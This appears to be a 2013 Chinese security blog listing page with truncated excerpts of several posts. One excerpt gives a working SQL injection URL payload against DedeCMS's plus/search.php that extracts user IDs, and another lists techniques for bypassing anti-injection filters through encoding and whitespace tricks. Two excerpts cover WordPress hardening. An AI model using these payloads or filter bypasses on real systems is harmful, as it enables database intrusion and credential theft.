dedecms plus/search.php 注入漏洞利用方式
先提交: xx.com/plus/search.php?keyword=as&typeArr[1 uNion 1]=a 看结果如果提示 Safe Alert: Request Error step 2 ! 那么直接用下面的exp xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12…
468 2013-01-21 去围观修改wordpress表前缀wp_
wordpress是全世界很受欢迎的博客程序之一,但是因为受欢迎也是经常受黑客攻击的对象之一,垃圾邮件发送也试图往博客里发留言恶意链接,通常黑客攻击的常用手段是SQL注入,这个是涉及到数据库的问题。 默认情况下数据库的表前缀是wp_开头的,如果不进行修改的话黑客已…
439 2013-01-15 去围观WordPress安全与防范
WordPress很多人都知道建站很方便功能也很强大,博客广泛流行使用。 但是很多人建站的时候根本不在乎其安全性认为尽然这么多人用了肯定很安全, 要知道在互联网上没有绝对安全的。如何防止黑客入侵WordPress呢?虽然我们没有黑客那般的头脑但是我们现有用管理员的权…
405 2013-01-14 去围观11招帮你绕过防注入
1、运用编码技术绕过 如URLEncode编码,ASCII编码绕过。 例如or 1=1即 %6f%72%20%31%3d%31 而Test也可以为 CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116) 2、通过空格绕过 如两个空格代替一个空格,用Tab代替空格等,或者删除所有空格,如 or” swords” =‘…
361 2013-01-09 去围观